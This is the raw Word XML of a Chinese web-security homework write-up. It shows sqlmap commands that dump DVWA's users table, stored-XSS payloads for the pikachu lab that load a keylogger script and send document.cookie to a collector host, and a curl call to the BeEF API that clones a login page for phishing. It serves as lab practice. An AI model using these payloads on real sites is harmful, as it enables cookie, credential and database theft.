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 Sqlmap 工具完成对 DVWA 数据库的注入过程，要求按照库、表、列、内容的顺序进行注入；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E:\极客时间\第八周课件\sqlmap&gt;python sqlmap.py -r 1.txt --level 3  -p id --dbs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>(库）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62890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E:\极客时间\第八周课件\sqlmap&gt;python sqlmap.py -r 1.txt --level 3  -p id -D dvwa --tables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63980" cy="739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E:\极客时间\第八周课件\sqlmap&gt;python sqlmap.py -r 1.txt --level 3  -p id  -D dvwa -T users --columns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52295" cy="169672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E:\极客时间\第八周课件\sqlmap&gt;python sqlmap.py -r 1.txt --level 3  -p id -D dvwa -T users -C last_name,password --dump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193415" cy="1066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2、练习课件上给出的 SQL 注入绕过方式；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3、XSS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（1）使用 pikachu 平台练习 XSS 键盘记录、前台 XSS 盲打攻击获取 cookie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在存储型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XSS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模块输入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payload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(键盘记录）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script src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"http://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192.168.0.175:8083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/pkxss/rkeypress/rk.js"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&gt;&lt;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>/script&gt;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17060" cy="90170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right" w:pos="8306"/>
        </w:tabs>
        <w:jc w:val="left"/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前端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Cross-Site Scripting --&gt; XSS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之盲打模块，需要在此输入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payload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（获取cookie）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script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document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write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'&lt;img src="http://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192.168.0.175:8083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/pkxss/xcookie/cookie.php?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cookie='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document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cookie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'"/&gt;'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 xml:space="preserve">/script&gt; </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8306"/>
        </w:tabs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1204595"/>
            <wp:effectExtent l="0" t="0" r="38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 beef 制作钓鱼页面，克隆任意站点的登录页面并获取用户登录的账号密码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执行： curl -H "Content-Type: application/json; charset=UTF-8" -d '{"url":"http://192.168.0.175:8081/login.php","mount":"/clonejd"}' -X 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"http://192.168.0.23:3000/api/seng/clone_page?token=6177d85f8212e04ac9d4064c3585b00c3cce6e81"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http://192.168.0.23:3000/api/seng/clone_page?token=6177d85f8212e04ac9d4064c3585b00c3cce6e81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结果： </w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3968750" cy="624205"/>
            <wp:effectExtent l="0" t="0" r="889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F1538"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="A95F153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F4D051E"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="3F4D05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ZTQ2MjY4YjA1YjU0YTI3NTg1YTQ0YmJlMmIwZTEifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="022D26D5"/>
    <w:rsid w:val="17D94602"/>
    <w:rsid w:val="29EB47E2"/>
    <w:rsid w:val="2A523D56"/>
    <w:rsid w:val="5A5D23AA"/>
    <w:rsid w:val="5AB53F94"/>
    <w:rsid w:val="6EB25100"/>
    <w:rsid w:val="7D12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pkarqi</dc:creator>
  <cp:lastModifiedBy>pkarqi</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-08T08:19:25Z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F3505AC1430A439491AB5FF014211392_12</vt:lpwstr>
  </property>
</Properties>
</file>